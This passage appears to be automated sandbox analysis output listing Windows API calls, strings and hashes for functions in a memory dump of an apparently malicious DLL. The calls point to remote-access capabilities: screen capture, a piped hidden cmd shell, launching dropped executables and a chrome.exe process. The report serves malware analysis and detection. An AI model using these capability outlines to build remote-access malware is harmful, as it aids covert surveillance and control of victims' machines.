                                    • Part of subcall function 1004D9B2: GetLastError.KERNEL32(10053BE7,?,1005AA7F,10053BE7,00000000,10053BE7,?,?,1005AD24,10053BE7,00000007,10053BE7,?,10058D36,10053BE7,10053BE7), ref: 1004D9DA
                                  • _free.LIBCMT ref: 1005729E
                                  • _free.LIBCMT ref: 100572A9
                                  • _free.LIBCMT ref: 100572B4
                                  • _free.LIBCMT ref: 100573B0
                                  • _free.LIBCMT ref: 100573BC
                                  • _free.LIBCMT ref: 100573C8
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100573D6
                                  • _free.LIBCMT ref: 100573DF
                                  • _free.LIBCMT ref: 100573EB
                                  • _free.LIBCMT ref: 100573F7
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _free$CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
                                  • String ID:
                                  • API String ID: 3529756214-0
                                  • Opcode ID: f89c313329530165e33727de20b3d365a58936ccbb6a1bad69924e242e7bb26a
                                  • Instruction ID: c0f2c6c2f9fe5835ec5b00b66026b5b5ba310004d9ebc461a7fea94083d53a43
                                  • Opcode Fuzzy Hash: f89c313329530165e33727de20b3d365a58936ccbb6a1bad69924e242e7bb26a
                                  • Instruction Fuzzy Hash: 76517F75800119FBDF11DF90E885ADE7BBAFF40311F224066FD08A6150DB316E58EB61
                                  APIs
                                  • SetEvent.KERNEL32(?), ref: 100287E4
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 10028842
                                  • CloseHandle.KERNEL32(00000000), ref: 10028851
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: CloseEventFileHandleSize
                                  • String ID: Disable$Enable
                                  • API String ID: 2912433508-1261744749
                                  • Opcode ID: 283dfc7dd64cbc9a946f8b19d4af0399937d037122d4cc6e83708c09a345c6fc
                                  • Instruction ID: 65daffb511cbd46625f490a3220de8d2a23eece8960260fe788119e7b57a5541
                                  • Opcode Fuzzy Hash: 283dfc7dd64cbc9a946f8b19d4af0399937d037122d4cc6e83708c09a345c6fc
                                  • Instruction Fuzzy Hash: 6461ED38D003656BEB11CF74DC80BA87B63EF46340F948259FE856B242EB716A928390
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _free$Info
                                  • String ID:
                                  • API String ID: 2509303402-0
                                  • Opcode ID: c4b7c7b73d82581ed94c9f79f55ac657ce82776b65a811a00dd60912a9f433c8
                                  • Instruction ID: 29ea24923a35ea915172a8e38e642610aef7fa3c1a2c6eb3d111500899ecabfd
                                  • Opcode Fuzzy Hash: c4b7c7b73d82581ed94c9f79f55ac657ce82776b65a811a00dd60912a9f433c8
                                  • Instruction Fuzzy Hash: 8AD19B74A012469FDB11CFA8C881BEEBBF5FF08300F21447AE999E7242D675AD45CB64
                                  APIs
                                  • LoadCursorA.USER32(00000000,?), ref: 100324A1
                                    • Part of subcall function 10030BD0: GetCurrentThreadId.KERNEL32 ref: 10030BE8
                                    • Part of subcall function 10030BD0: GetThreadDesktop.USER32(00000000), ref: 10030BEF
                                    • Part of subcall function 10030BD0: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 10030C3A
                                    • Part of subcall function 10030BD0: lstrcmpiA.KERNEL32(?,?), ref: 10030C7E
                                    • Part of subcall function 10030BD0: SetThreadDesktop.USER32(00000000), ref: 10030C89
                                  • ReleaseDC.USER32(?,?), ref: 100324FA
                                  • GetDesktopWindow.USER32 ref: 10032500
                                  • GetDC.USER32(00000000), ref: 1003250D
                                  • GetTickCount.KERNEL32 ref: 10032521
                                  • GetSystemMetrics.USER32(00000050), ref: 10032536
                                  • Sleep.KERNEL32(00000008,00000000), ref: 1003258E
                                  • Sleep.KERNEL32(00000000), ref: 100325CC
                                  • Sleep.KERNEL32(00000000,00000008,?,00000001,00000008,?,?,00000008,?,00000001), ref: 1003260B
                                  • Sleep.KERNEL32(00000000), ref: 10032655
                                  • SetRect.USER32(00000030,00000000,00000000,?,?), ref: 1003268A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: DesktopSleep$Thread$CountCurrentCursorInputLoadMetricsOpenRectReleaseSystemTickWindowlstrcmpi
                                  • String ID:
                                  • API String ID: 2389640985-3916222277
                                  • Opcode ID: 52badff5b4d4cb1de07196544032dc56af8db64f36556531d39e5ba2d0c3a1e8
                                  • Instruction ID: a722f95fbdac056ee06f3a48056855751e3e5016b536a024836daecbb1eb59ca
                                  • Opcode Fuzzy Hash: 52badff5b4d4cb1de07196544032dc56af8db64f36556531d39e5ba2d0c3a1e8
                                  • Instruction Fuzzy Hash: 5F913571900254EFEF159F64CC85B597FA2FF08300F1541AAEE459F2AAEB72E850CB90
                                  APIs
                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 1001F55D
                                  • wsprintfA.USER32 ref: 1001F57C
                                    • Part of subcall function 10019F50: GetProcessHeap.KERNEL32(00000000,00000014), ref: 10019FB5
                                    • Part of subcall function 10019F50: RtlAllocateHeap.NTDLL(00000000), ref: 10019FBC
                                    • Part of subcall function 10019F50: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 1001A06C
                                  • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 1001F59B
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 1001F5B1
                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1001F604
                                  • CloseHandle.KERNEL32(00000000), ref: 1001F614
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: File$Heap$AllocAllocateCloseCreateFolderHandlePathProcessSizeSpecialVirtualWritewsprintf
                                  • String ID: ARPD$PluginMe$getDllName$isARDll$isCSDll
                                  • API String ID: 268699387-2378132350
                                  • Opcode ID: 3b13e694d258432e79d20dedfd73d3652f189f1f7819bca22a006c1c075edc9d
                                  • Instruction ID: 36d3e5b69c688cf18c29ffadb60bf7c3e182e5066e73595de7a75e096eab22e7
                                  • Opcode Fuzzy Hash: 3b13e694d258432e79d20dedfd73d3652f189f1f7819bca22a006c1c075edc9d
                                  • Instruction Fuzzy Hash: 8502D171A006189BDB24CB28CD85BAEB7B1EF95346F1042DCE409AB285DB34EFC58F50
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100266AC
                                  • CreatePipe.KERNEL32 ref: 1002673F
                                  • CreatePipe.KERNEL32(00000000,00000000,?,00000000), ref: 10026787
                                  • GetStartupInfoA.KERNEL32(?), ref: 100267CD
                                  • GetSystemDirectoryA.KERNEL32 ref: 10026811
                                  • lstrcat.KERNEL32 ref: 10026845
                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,?,?,?,?), ref: 1002686B
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,?,?,?,?), ref: 100268D7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Create$Pipe$DirectoryEventInfoObjectProcessSingleStartupSystemWaitlstrcat
                                  • String ID: .exe$D$\cmd
                                  • API String ID: 2606278758-2440019170
                                  • Opcode ID: 3ed9c315bf05898f21788ab9fcfc7504eef255f47bcdf1122a02478e74f96d2a
                                  • Instruction ID: 786f3573f654844e046453a757b94a0ba9031c78cdcd2f39e8521909087c700e
                                  • Opcode Fuzzy Hash: 3ed9c315bf05898f21788ab9fcfc7504eef255f47bcdf1122a02478e74f96d2a
                                  • Instruction Fuzzy Hash: 1C8149B1604345AFE320DF64DC85F9BB7E9EF88710F51091EF689DB290DBB0A5048B96
                                  APIs
                                  • _wcsrchr.LIBVCRUNTIME ref: 100111EF
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 10011216
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000), ref: 1001125E
                                  • CloseHandle.KERNEL32(00000000), ref: 1001126A
                                  • DeleteFileW.KERNEL32(?), ref: 10011277
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,00000000,?), ref: 100113C0
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000000,00000000,?), ref: 1001140B
                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 100114A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: File$Create$CloseDeleteHandlePathProcessTempWrite_wcsrchr
                                  • String ID: <$D
                                  • API String ID: 2398361806-1382654409
                                  • Opcode ID: 899b3174667d240c671d059c459f3017cd6c3f57b25ff8dbf47844304b279ae1
                                  • Instruction ID: 5ef1a3b275aca8608455a5efd5301564ccfbb53e988b83423ec15216829ac455
                                  • Opcode Fuzzy Hash: 899b3174667d240c671d059c459f3017cd6c3f57b25ff8dbf47844304b279ae1
                                  • Instruction Fuzzy Hash: FC813171A00229ABEB21DB61CC85BEA77F9FB59740F118195F609A6180DFB09FC58F60
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10024224
                                  • Sleep.KERNEL32(000001F4), ref: 1002423A
                                  • GetLastError.KERNEL32 ref: 10024256
                                  • wsprintfA.USER32 ref: 1002426A
                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 100242E2
                                  • LocalAlloc.KERNEL32(00000040,00002000), ref: 100242F9
                                  • ReadFile.KERNEL32(?,00000009,00001FF7,00000000,00000000), ref: 1002432D
                                  • LocalFree.KERNEL32(00000000,00000000,-00000009), ref: 10024363
                                  • Sleep.KERNEL32(00000032), ref: 10024374
                                  • LocalFree.KERNEL32(00000000), ref: 1002439F
                                  • CloseHandle.KERNEL32(?), ref: 100243AB
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: FileLocal$FreeSleep$AllocCloseCreateErrorHandleLastPointerReadwsprintf
                                  • String ID:
                                  • API String ID: 623555137-0
                                  • Opcode ID: 65d77f132fbdbeaf6306fcc9b00634c87e66eb509b3b1eef113a91381f9c837a
                                  • Instruction ID: ccae23a96e95919625752bdad9cb5dd0a5c24f73f402aa891b09639bbfb38deb
                                  • Opcode Fuzzy Hash: 65d77f132fbdbeaf6306fcc9b00634c87e66eb509b3b1eef113a91381f9c837a
                                  • Instruction Fuzzy Hash: F551C7B1A00228DFE710CF64DC84B99B7B9EF04300F4281E9F7099B291DBB19A85CF64
                                  APIs
                                  • SetEvent.KERNEL32(?,10081068), ref: 100250DD
                                  • WaitForSingleObject.KERNEL32(?,000000FF,10081068), ref: 10025100
                                  • CloseHandle.KERNEL32(?), ref: 10025109
                                  • lstrcpy.KERNEL32(?,?), ref: 10025189
                                  • CreateThread.KERNEL32(00000000,00000000,100253E0,?,00000000,00000000), ref: 10025203
                                  • waveOutGetNumDevs.WINMM ref: 1002529B
                                  • waveOutOpen.WINMM(?,0000FFFF,?,00000001,00000001,00000001,?), ref: 100252E7
                                  • waveOutPrepareHeader.WINMM(?,?,00000020), ref: 10025328
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: wave$CloseCreateDevsEventHandleHeaderObjectOpenPrepareSingleThreadWaitlstrcpy
                                  • String ID: N/A@
                                  • API String ID: 764069715-4129345051
                                  • Opcode ID: 7323ba334bfb610fab8e08a269bd99daf50d31b3a4be74cd48c6995e9e79bceb
                                  • Instruction ID: 47563312a0fc17b4a1b64f804b7a2416886b3209ef52ef290e37a0e1b3c01b8f
                                  • Opcode Fuzzy Hash: 7323ba334bfb610fab8e08a269bd99daf50d31b3a4be74cd48c6995e9e79bceb
                                  • Instruction Fuzzy Hash: 9FA1D071A007199FDB20CF64DC85B8ABBF5FF09341F414499EA4AAB281D772EA54CF84
                                  APIs
                                  • _strrchr.LIBCMT ref: 100236A0
                                  • _strrchr.LIBCMT ref: 100236C8
                                  • wsprintfA.USER32 ref: 10023781
                                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 100237F1
                                  • _strstr.LIBCMT ref: 10023803
                                  • _strstr.LIBCMT ref: 1002381B
                                  • lstrcpy.KERNEL32(00000000), ref: 10023849
                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 100238E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _strrchr_strstr$CreateEnvironmentExpandProcessStringslstrcpywsprintf
                                  • String ID: D
                                  • API String ID: 4149003945-2746444292
                                  • Opcode ID: 3e73d4a83887374021f13c5da11a292d1b00b387e3aa54c9bcf8239100bd54f5
                                  • Instruction ID: 1caa808d4564248101c784bcb04cd0b791b72e985642bf120115b546435730cc
                                  • Opcode Fuzzy Hash: 3e73d4a83887374021f13c5da11a292d1b00b387e3aa54c9bcf8239100bd54f5
                                  • Instruction Fuzzy Hash: 0E61C9B5D4071D6ADB21CA509C46FEB73BCEF48745F4045DAFA08AA141EBB1AB848F90
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Getcvt
                                  • String ID: false$true
                                  • API String ID: 1921796781-2658103896
                                  • Opcode ID: 47185ba96e5af19553e0c8a8cad828e47773be1976c07375410ccb7ed204e218
                                  • Instruction ID: f0f8e2943ad4460293dbc00bc4894cc9d6669610e4ede311a213f4e74158cb4e
                                  • Opcode Fuzzy Hash: 47185ba96e5af19553e0c8a8cad828e47773be1976c07375410ccb7ed204e218
                                  • Instruction Fuzzy Hash: F0417635A046805FDF26CFA8C94175ABBA1FF81211F1481AED8895F382C7B6A905CBA1
                                  APIs
                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000), ref: 1002499D
                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000), ref: 100249DD
                                  • SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 100249FA
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10024A18
                                  • CloseHandle.KERNEL32(00000000), ref: 10024A4A
                                  • GetLastError.KERNEL32 ref: 10024A66
                                  • wsprintfA.USER32 ref: 10024A83
                                  • GetLastError.KERNEL32 ref: 10024B14
                                  • wsprintfA.USER32 ref: 10024B31
                                  • CloseHandle.KERNEL32(00000000), ref: 10024B50
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: File$CloseCreateErrorHandleLastwsprintf$PointerWrite
                                  • String ID:
                                  • API String ID: 3066163878-0
                                  • Opcode ID: 9eb8d085306f29f03cff5dec70068d56459441646f23977becffe2121f3e5e72
                                  • Instruction ID: f1c3065c4181bf4fb5b7a9dc903f6149b0c3cec05452de956635d795cdd499e0
                                  • Opcode Fuzzy Hash: 9eb8d085306f29f03cff5dec70068d56459441646f23977becffe2121f3e5e72
                                  • Instruction Fuzzy Hash: FB61F8B6900228ABD710DF64DC85FDAB7B9EF44304F0141A5F749E7282DF70AA858F69
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8130b5bf3d6a6504ef1b2988e7de1d48f8553a154777b98b391ff1118c4f9026
                                  • Instruction ID: 7985e204e576b4bef692afe4547fa3636b717694c8562f03cc4c105b6e8efaf9
                                  • Opcode Fuzzy Hash: 8130b5bf3d6a6504ef1b2988e7de1d48f8553a154777b98b391ff1118c4f9026
                                  • Instruction Fuzzy Hash: D7C1D174E086499FDB05CF98C881BADBBB1FF4A350F214169F814A7292DB70AD49CB61
                                  APIs
                                    • Part of subcall function 10030BD0: GetCurrentThreadId.KERNEL32 ref: 10030BE8
                                    • Part of subcall function 10030BD0: GetThreadDesktop.USER32(00000000), ref: 10030BEF
                                    • Part of subcall function 10030BD0: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 10030C3A
                                    • Part of subcall function 10030BD0: lstrcmpiA.KERNEL32(?,?), ref: 10030C7E
                                    • Part of subcall function 10030BD0: SetThreadDesktop.USER32(00000000), ref: 10030C89
                                  • ReleaseDC.USER32(?,?), ref: 10032842
                                  • GetDesktopWindow.USER32 ref: 10032848
                                  • GetDC.USER32(00000000), ref: 10032855
                                  • GetCursorPos.USER32(?), ref: 10032874
                                  • GetSystemMetrics.USER32(00000000), ref: 10032889
                                  • GetCursorInfo.USER32(00000014), ref: 100328F3
                                  • DestroyCursor.USER32(?), ref: 10032943
                                  • Sleep.KERNEL32(00000032,?,?), ref: 10032982
                                  • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,00000000,?), ref: 100329C6
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Desktop$CursorThread$CurrentDestroyInfoInputMetricsOpenReleaseSleepSystemWindowlstrcmpi
                                  • String ID:
                                  • API String ID: 1765932616-0
                                  • Opcode ID: 6a33f27fed84e6d03566300163f1dde5321f8d410a70f1908f64162ccb635e84
                                  • Instruction ID: 7579fc6ac411246c87f2577ad8d88e6ee9d50e72280a8eb3aea8037765a0d85c
                                  • Opcode Fuzzy Hash: 6a33f27fed84e6d03566300163f1dde5321f8d410a70f1908f64162ccb635e84
                                  • Instruction Fuzzy Hash: FCB13CB1A00215CFDF15CF68D8C0A9DBBF1FF59315F2582AAD905AB216D731A990CF90
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: f5c421c31156489343b0da40b126b6eeecb66c355fd69381b6d845816dfd98a2
                                  • Instruction ID: 39db7832273ac5931eafd64f4a08040df3c92ea27cb9b648b8a3d62a5ce9ff67
                                  • Opcode Fuzzy Hash: f5c421c31156489343b0da40b126b6eeecb66c355fd69381b6d845816dfd98a2
                                  • Instruction Fuzzy Hash: 5A610676900345AFD721DF64C881BAAB7F8FF45350F22456BE945EB281EB30AD84CB60
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 1002D4DD
                                  • GetLastError.KERNEL32 ref: 1002D4E3
                                  • wsprintfA.USER32 ref: 1002D560
                                    • Part of subcall function 1002F230: GetWindowsDirectoryA.KERNEL32(?,00000104,1006421C), ref: 1002F265
                                    • Part of subcall function 1002F230: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1002F2A6
                                    • Part of subcall function 1002F230: wsprintfA.USER32 ref: 1002F325
                                  • GetFileAttributesA.KERNEL32(?), ref: 1002D5F7
                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1002D6FA
                                    • Part of subcall function 1002C350: lstrcpy.KERNEL32(?), ref: 1002C3CD
                                    • Part of subcall function 1002C350: lstrcat.KERNEL32(?,1007918C), ref: 1002C3DF
                                    • Part of subcall function 1002C350: CreateDirectoryA.KERNEL32(?,00000000,?,100628E0,000000FF,?,?,?,1002D5D3), ref: 1002C3E8
                                    • Part of subcall function 1002C350: GetLastError.KERNEL32(?,00000000,?,100628E0,000000FF,?,?,?,1002D5D3), ref: 1002C3F2
                                    • Part of subcall function 1002C350: FindFirstFileA.KERNEL32(?,?,?,00000000,?,100628E0,000000FF,?,?,?,1002D5D3), ref: 1002C411
                                    • Part of subcall function 1002C350: lstrcpy.KERNEL32(?,?), ref: 1002C455
                                    • Part of subcall function 1002C350: lstrcat.KERNEL32(?,10078558), ref: 1002C467
                                    • Part of subcall function 1002C350: lstrcat.KERNEL32(?,?), ref: 1002C47B
                                    • Part of subcall function 1002C350: lstrcpy.KERNEL32(?,?), ref: 1002C4A4
                                    • Part of subcall function 1002C350: lstrcat.KERNEL32(?,10078558), ref: 1002C4B6
                                    • Part of subcall function 1002C350: lstrcat.KERNEL32(?,?), ref: 1002C4CA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$CreateDirectoryErrorFileLastwsprintf$AttributesFindFirstFolderInformationPathProcessVolumeWindows
                                  • String ID: D$chrome.exe
                                  • API String ID: 3681278241-23253965
                                  • Opcode ID: 2c03fc182a0ad5486635a3b9926effc1412543c093c58f195988cfab7cd9f53c
                                  • Instruction ID: 15f1bd375911359996dff94cee0e7117c08e48e32063d1784a0e201582aef879
                                  • Opcode Fuzzy Hash: 2c03fc182a0ad5486635a3b9926effc1412543c093c58f195988cfab7cd9f53c
                                  • Instruction Fuzzy Hash: 73611DB1D0022DAADB60EBA0DC45FDD77BCFB48304F505696B648A6081EF746B888F94
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000001), ref: 100214CD
                                    • Part of subcall function 1002E840: VerifyVersionInfoW.KERNEL32(00000023), ref: 1002E8F1
                                  • RegOpenKeyExA.ADVAPI32(80000002,10079124,00000000,00020019,?), ref: 10021552
                                  • RegGetValueA.ADVAPI32(?,10076AB6,10076AB6,00000002,?,?,00000064), ref: 10021590
                                  • RegCloseKey.ADVAPI32(?), ref: 100215AD
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0002E100,?,00000000,00000000), ref: 1002167D
                                  • CloseHandle.KERNEL32(?), ref: 1002169A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: CloseCreate$EventHandleInfoOpenThreadValueVerifyVersion
                                  • String ID: d
                                  • API String ID: 2304768424-2564639436
                                  • Opcode ID: 5b38c763151371bf031fe29f1e883901f1e90fa44187d76b4507ec25094f149d
                                  • Instruction ID: 0b59b5de6b27c163732ab02d8f46c316abe42fad7e54ca7a8956f7cf9ad12c33
                                  • Opcode Fuzzy Hash: 5b38c763151371bf031fe29f1e883901f1e90fa44187d76b4507ec25094f149d
                                  • Instruction Fuzzy Hash: 6151AD71D40238AEEB21DF60DC45BEA7BB9EF04700F4040ABFA49A6192DB759E94CF51
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _strstr$ComputerNamelstrcpywsprintf
                                  • String ID: Disable$Enable
                                  • API String ID: 296541848-1261744749
                                  • Opcode ID: c7b564df3675de81f6352a4d599098a566770de5f326f083f9ed0b1c30d6b728
                                  • Instruction ID: 6934e42f89e9ac809b51f93920c07a8f94280ca3bd0675ecc5715ecc0d440299
                                  • Opcode Fuzzy Hash: c7b564df3675de81f6352a4d599098a566770de5f326f083f9ed0b1c30d6b728
                                  • Instruction Fuzzy Hash: F92127B4D403096BDF10DB609C4AFDA736DEB45705F4044D6FB08AB182EFB66B548BA4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _free$___from_strstr_to_strchr
                                  • String ID:
                                  • API String ID: 3409252457-0
                                  • Opcode ID: 64422d3bc8fe90691881c3bcb23d12018d5f50c6e53eb6454067c556ed32d16a
                                  • Instruction ID: 7c83897640e8797439872514b9e8a5476071033841cb2a5a6d6ca014e50f18cf
                                  • Opcode Fuzzy Hash: 64422d3bc8fe90691881c3bcb23d12018d5f50c6e53eb6454067c556ed32d16a
                                  • Instruction Fuzzy Hash: 22512674D04201AFEB10DFA8AC81A5D7BF8FF09350F11816EE904E7282EA71A949CF51
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,10081068), ref: 100260D6
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 1002610C
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10026117
                                  • Sleep.KERNEL32(00000096), ref: 10026122
                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?), ref: 10026150
                                  • GetSystemMetrics.USER32(00000050), ref: 1002619E
                                  • EnumDisplayMonitors.USER32(00000000,00000000,Function_00025010,00000000), ref: 100261DB
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocDisplayEnumFreeMetricsMonitorsObjectSingleSleepSystemWait
                                  • String ID:
                                  • API String ID: 2383587994-0
                                  • Opcode ID: bb3e193ba24adf121f69ad59f07e5aa0dabdec732a6fd69fd5905438baae685d
                                  • Instruction ID: 6045a29f2f492542641c46b8e818c3c20a61fb97dc052a67636913add13cbe6d
                                  • Opcode Fuzzy Hash: bb3e193ba24adf121f69ad59f07e5aa0dabdec732a6fd69fd5905438baae685d
                                  • Instruction Fuzzy Hash: 2D71E135A00614EFEB12CF64CC81F5A77B5FF49350F05826AF9056B292DB71B850CBA0
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,10081068), ref: 100256D0
                                  • LoadCursorA.USER32(00000000,?), ref: 1002572B
                                  • Sleep.KERNEL32(00000001,00000008,00000000,?), ref: 10025786
                                  • LoadLibraryA.KERNEL32(10078790), ref: 100257AA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 100257F8
                                  • CreateThread.KERNEL32(00000000,00000000,10030AC0,10026080,00000000,00000000), ref: 10025812
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1002584E
                                  • CreateThread.KERNEL32(00000000,00000000,10030AC0,10026310,00000000,00000000), ref: 10025868
                                  Memory Dump Source
